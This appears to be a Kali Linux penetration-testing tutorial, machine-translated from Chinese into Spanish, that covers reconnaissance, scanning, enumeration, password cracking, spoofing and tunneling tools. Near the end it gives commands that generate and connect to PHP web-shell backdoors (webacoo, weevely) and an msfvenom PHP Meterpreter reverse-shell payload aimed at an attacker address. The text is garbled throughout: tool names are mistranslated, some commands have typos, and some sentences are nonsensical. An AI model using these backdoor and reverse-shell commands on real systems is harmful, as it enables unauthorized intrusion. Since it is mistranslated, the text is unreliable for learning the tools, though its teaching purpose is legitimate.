Kali Linux Introducción e Introducción
1. Características principales de kali
Sitio web oficial de Kali: https://www.kali.org/
Distribución de Linux basada en Debian
Integrar más de 300 procedimientos de prueba de penetración.
Admite la mayoría de las tarjetas de red inalámbricas
2. Configuración del servicio de red
1. Establecer IP fija:
Archivo de configuración de red de máquina virtual
/etc/network/interfaces
2. Comando de configuración de ip temporal
ifconfig eth0 192.168.43.100 netmask 255.255.255.0 //ip
route add default gw 192.168.43.1 //网关路由
systemctl restart networking.service //重启网络恢复
3. El rol del comando dmesg:
Vea la información del hardware de la tarjeta de red inalámbrica, vea la información del búfer del anillo del núcleo
4. Comandos para encender y apagar la red
Puede usar los comandos systemctl o service aquí. La sintaxis es básicamente la misma. La versión anterior de kali solo puede admitir el comando service.
Las sintaxis comunes son:
start //开启
stop //关闭
restart //重启
5. Servicios de uso común en Kali
http (apache)
service apache2 start // Iniciar
service apache2 stop // Cerrar
service apache2 restart // Reiniciar
update-rc.d apache2 por defecto // Self-start
mysql
service mysql start // Iniciar
service mysql stop // Cerrar
service mysql restart // Reiniciar
update-rc.d mysql por defecto // Desde el inicio de
mysql -u root -p // Iniciar sesión
ssh
service ssh start // Iniciar
service ssh stop // Cerrar
service ssh restart // Reiniciar
update-rc.d valores predeterminados de ssh // Inicio automático
3. Actualización del sistema
Comando
apt-get update
apt-get upgrate
apt-get dist-upgrade
PD: La última versión del Kali, que es la versión 2020, no es muy compatible, y muchas de mis herramientas de uso común han sido eliminadas. Personalmente, no recomiendo actualizar, excepto por necesidades.
aptcache search <包名> //在软件仓库查找某个软件包的名称
apt-get install <包名> //指定安装某个软件
Descripción general de las pruebas de penetración
1. Metodología de cinco marcos de prueba
开源安全测试方法论
信息系统安全评估框架
开放式web应用安全项目
web应用安全联合威胁人类
渗透测试执行标准
Segundo, el marco de prueba de penetración universal
范围界定
信息收集
目标识别
服务枚举
漏洞映射
社会工程学
漏洞利用
提升权限
访问维护
文档报告
Pasos de implementación de pruebas de penetración
1. Recolección de información
Definición, uso y uso del comando whois
whois example.com
Este comando devolverá información detallada sobre el nombre de dominio del registrante del nombre de dominio example.com e información de contacto.
Sitio web oficial: https://who.is/
Análisis de registros DNS
1. anfitrión
host www.example.com
Solo devuelve la dirección IP (ipv4) cuando no hay ningún parámetro
host -a www.example.com
Agregue el parámetro -a para devolver todos los registros dns
2da excavación
dig example.com
Cuando no hay ningún parámetro, solo se devuelve la dirección de registro A (IPV4)
dig example.com any
Agregue el parámetro any para devolver todos los registros dns
3. dnsenum
dnsenum example.com
De forma predeterminada, devolverá la información de la dirección IP de la dirección del host, el servidor de resolución de nombres y el servidor de correo.
Si tiene un diccionario, puede usar esta herramienta para
destruir el subdominio dnsenum -f dns.txt example.com
4. dmitry
dmitry -iwnse targethost
Realizar consulta whois
Información de host de minería en el sitio web de Netcraft.com
Buscar todos los subdominios posibles
Buscar todas las direcciones de correo electrónico posibles
dmitry targethost -f -b
Haga un escaneo de puerto simple (muy lento y no muy fácil de usar, no recomendado)
Información de enrutamiento
1. tcptraceroute
tcptraceroute example.com
Se sabe que el servidor web de destino ha abierto el puerto 80 utilizando el protocolo TCP. Use el comando anterior para obtener información completa de enrutamiento de la máquina local al host de destino.
ps: bloqueado fácilmente por firewall
2. tctrace
tctrace -i eth0 -d example.com
Especifique la tarjeta de red eth0 para obtener información de enrutamiento entre esta máquina y example.com
Reconocimiento de objetivos
Blog columnas penetración de herramientas de uso común pruebas - reconocimiento de la diana
1. ping
ping -c 10 example.com
ping -c 10 192.168.123.256
El parámetro -c especifica el número de paquetes enviados (tiempos de ejecución)
El parámetro -i especifica la dirección de origen o la interfaz de red (tarjeta de red)
-s especifica el tamaño del paquete (el tamaño predeterminado es 64 bytes)
2. arping
arping 192.168.56.102 -c 1
Compruebe si el host en la LAN está en línea, el parámetro -i especifica la tarjeta de red, el parámetro -c especifica el número de veces
3. fping
fping 192.168.1.1 192.168.1.100 192.168.1.107
Compruebe si los tres hosts están en línea
fping -g 192.168.56.0/24
Detecta todo el segmento de red
fping -r 1 -g 192.168.1.1 192.168.1.10
El parámetro -r especifica el número de reintentos, el valor predeterminado es 3
fping -s www.baidu.com www.cqcet.edu.cn www.csdn.net
-s parámetro para ver los resultados estadísticos de múltiples objetivos
4. Hping3
Propósito principal
Probar las reglas del firewall
Prueba de sistema de detección de intrusos / IDS
Probar vulnerabilidades de seguridad en modo TCP / IP
hping3 -0 192.168.56.101 发送原始IP包(--raw-ip)
hping3 -1 192.168.56.101 发送ICMP包(--icmp)
hping3 -2 192.168.56.101 发送UDP包(--udp)
hping3 -8 192.168.56.101 进入扫描模式(--scan)
hping3 -9 192.168.56.101 进入监听模式(--listen)
5. nping
nping --tcp-connect -c 1 -p 22 192.168.56.102 基础的tcp-connect功能
nping --tcp -c 1 -p 22 192.168.6.102 TCP模式
nping --udp -c 1 -p 22 192.168.6.102 UDP模式
nping --icmp -c 1 -p 22 192.168.6.102 ICMP模式(默认模式)
nping --arp -c 1 -p 22 192.168.6.102 ARP/RARP模式
nping --tr -c 1 -p 22 192.168.6.102 traceroute模式
6. nbtscan
nbtscan 192.168.1.1-254
Busque el nombre NetBIOS de cada host en la LAN
nbtscan -hv 192.168.1.1-254
-hv parámetro para ver qué servicios se están ejecutando
7. uniscan
Identificación del sistema operativo
1. p0f
Puede identificar los siguientes hosts
La máquina conectada a su host (modo SYN, el modo predeterminado)
Máquinas accesibles por el host (modo SYN + ACK)
Máquinas a las que el host no puede acceder (modo RST +)
Máquinas que pueden monitorear la comunicación de su red.
p0f -f /etc/p0f/p0f.fp -o p0f.log
Abra el puerto 80 para acceder a la máquina de destino
2. nmap
nmap -O 192.168.43.89 //操作系统识别
La tasa de reconocimiento no es muy alta.
Servicio de enumeración
Herramientas comunes para pruebas de penetración-enumeración de servicios amap
Escaneo de red
1. nmap
Función principal
Detección de host
Escaneo de puertos
Servicio / detección de versión
Detección del sistema operativo
Enrutamiento de red
Motor de script Nmap
nmap -sT 192.168.43.89 //TCP连接扫描
nmap -sS 192.168.43.89 //SYN扫描
nmap -sN 192.168.43.89 //TCP NULL扫描
nmap -sF 192.168.43.89 //TCP FIN扫描
nmap -sX 192.168.43.89 //TCP XMAS扫描
nmap -sM 192.168.43.89 //TCP Maimon扫描
nmap -sA 192.168.43.89 //TCP ACK扫描
nmap -sW 192.168.43.89 //TCP 窗口扫描
nmap -sI 192.168.43.89 //TCP Idel扫描
Opciones de escaneo
-p 端口范围 :只扫描指定的端口
-F (快速扫描):仅扫描100个常用端口
-r (顺序扫描):按照从小到大的顺序扫描端口
--top-ports <1 or greater> 扫描nmap-services里排名前N的端口
Opciones de puerto de destino
Salida interactiva (pantalla) La salida
normal (-oN) no muestra la información de tiempo de ejecución y la información de advertencia
Archivo XML (-oX) El archivo de formato XML generado se puede convertir en un archivo html, y también se puede analizar mediante la interfaz gráfica de usuario, que es fácil de importar a la base de datos
para que Grep lo use Archivos (-oG)
Opciones de salida
-T Especifica el modo de control de horario
Opciones de control de horario
nmap -sV 192.168.43.89 -p 22 //服务版本识别
nmap -O 192.168.43.89 //操作系统检测
nmap -Pn 192.168.43.89 //禁用主机检测
nmap -A 192.168.43.89 //综合扫描
Opciones comunes
-sC 或 --script = default 启动默认类NES脚本
--script <filename>|<category>|<directories> 根据指定的文件名、类别名、目录名,执行相应的脚本
--script-args<args> 给脚本指定参数
Motor de secuencias de comandos
-f 使用小数据包
--mtu 调整数据包的大小
-D 指定假IP
--source-port<portnumber>或-g 模拟源端口
--data-length 改变发送的数据包的默认长度
--max-parallelism 限制nmap并发扫描的最大连接数
--scan-delay<time> 控制发送探测数据的时间间隔
editar
2. Unicornscan
-m U detecta el protocolo UDP
-m T detecta el protocolo TCP
-Iv Ver salida detallada
-r Ajusta la velocidad de envío de paquetes
unicornscan -m U -Iv 192.168.43.89:1-65535 -r 10000
unicornscan -m T -Iv 192.168.43.89:1-65535 -r 10000
Enumeración SMB
1. nbtscan
nbtscan 192.168.56.1-254
Busque el nombre NetBIOS de cada host en 192.168.56.0
nbtscan -hv 192.168.56.102
Ver el servicio de red de este host 192.168.56.102
Enumeración SNMP
Una herramienta común para pruebas de penetración: ADMsnmp para análisis snmp
1. onesixtyone
onesixtyone 192.168.56.102
Cadena SNMP compatible con el host de búsqueda
onesixtyone -d 192.168.56.102
Realizar un escaneo más detallado
2. snmpcheck
snmpcheck -t 192.168.56.102
Recopilar información sobre dispositivos SNMP
Enumeración VPN
1. ike-scan
ike-scan -M -A -Pike-hashkey 192.168.0.10
Detecta, identifica y prueba un servidor VPN IPSec
-M divide la información de decodificación de la carga útil en varias líneas para facilitar la lectura
-Un modo agresivo de IKE
-P Guardar el valor hash del modo agresivo y la clave compartida como un archivo
Mapeo de vulnerabilidad
1. Tipos de vulnerabilidades
Vulnerabilidad local
Vulnerabilidad remota
En segundo lugar, el escáner de vulnerabilidades.
OpenVAS
Herramientas de análisis de Cisco
Herramienta de auditoría de Cisco (cat)
Ejecutar:
cd /usr/share/
CAT --help
Comandos:
-h especifica el nombre del host (use esta opción al escanear un solo host)
-w especifica el nombre del diccionario (para adivinar la cadena de la comunidad)
-a especifica la lista de contraseñas (para agotar la contraseña)
-i y [ioshist] (verifique el IOS Errores que han aparecido en la historia)
Cisco Global Exploiter (cge)
Ejecutar:
cd /usr/bin/
cge.pl
Comando
cge.pl 10.200.213.25 3
El tercer tipo de prueba
Herramienta de análisis FUZZ (difusa)
CAMA (continuará)
JBroFuzz (continuará)
3. Herramienta de análisis SMB
ImpacketSamrdump
(Continuará)
4. herramienta de análisis SNMP
SNMP Walk
(Continuará)
5. Herramientas de análisis de programas web.
Herramientas de evaluación de bases de datos
DBPwAudit (continuará)
sqlmap
SQL Ninja (continuará)
Herramienta de evaluación de aplicaciones web
Burpsuite (continuará)
Proxy Paros (continuará)
W3af (continuará)
WafW00f (continuará)
Webscarab (continuará)
Explotar
MSFConsole
MSFConsole_ Módulos de uso común
MSFConsole_Post-Infiltration Module
Elevación de autoridad
1. Clasificación
Elevación vertical
Elevación horizontal de derechos
Segundo, el uso de vulnerabilidades locales.
3. Ataque de contraseña
Basado en el conocimiento
Basado en todos
Basado en funciones
Ataque fuera de línea
Ataque en línea
algoritmo hash de juicio hash-idntifire: solo use el algoritmo hash utilizado por el sistema bajo prueba para descifrar la contraseña
Descifrado de contraseñas multiproceso de Hashcat, utilizando completamente la CPU
RainbowCrack usa la mesa arcoiris para romper e intercambiar espacio por tiempo
samdump2 descifra la contraseña de la cuenta del sistema de Windows
John descifró el hash y el tipo de cripta DES es excelente.
Versión gráfica de Johnny John.
Crunch crea un diccionario de contraseñas que puede usarse para descifrar la fuerza bruta
Tipo de Ophcrack LM / NTML basado en la tabla del arco iris
Herramienta de craqueo en línea
El modo de rastreador CeWL es una herramienta para recopilar palabras en una URL especificada y poner las palabras recopiladas en un diccionario para mejorar la tasa de aciertos
Hydra crack contraseña en línea
Medusa crack contraseña en línea
4. herramientas de suplantación de identidad en Internet
Sniffing de red y spoofing de red
DNSchef
Respuesta de DNS al host probado para el servidor DNS, resuelva el nombre de dominio a la IP controlada por el atacante, de modo que el host del atacante desempeñe el papel de servidor real
arpspoof
Herramienta práctica para ayudar a la supervisión de la red en la conmutación de red.
Ettercap
Herramientas para ataques man-in-the-middle en LAN
Cinco, sniffer de red
Dsniff
tcpdump
Wireshark
Mantenimiento de acceso
Primero, la puerta trasera del sistema operativo
Cymothoa
Intersecarse
Medidor preter
Segundo, la herramienta de túnel
dns2tcp
yodo
ncat
proxychains
ptunnel
conmocionado
sslh
stunnel4
Tres, crea una puerta trasera web
WeBaCoo
Comando:
-g crear código de puerta trasera
-f función php requerida para puerta trasera: sistema (predeterminado) / shell_exec / exec / passthru / popen
-o genera el nombre del archivo del programa de puerta trasera especificado generado
Ejemplo:
webacoo -g -o test.php 使用默认配置生成php后门程序
webacoo -t -u http://192.168.43.89/test.php
Conectarse a la puerta trasera
cada semana
Genere una puerta trasera PHP ofuscada y guarde la puerta trasera como display.php
weevely generate password display.php
weevely http://192.168.43.89/display.php password
Acceda a la shell web del host bajo prueba
PHP Meterpreter
-p especifica la carga útil como php / meterpreter / reverse_tcp
-f Establecer formato de salida
lhost es la dirección del atacante
lport es el puerto del atacante
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.180 LPORT=1234 -f raw > a.php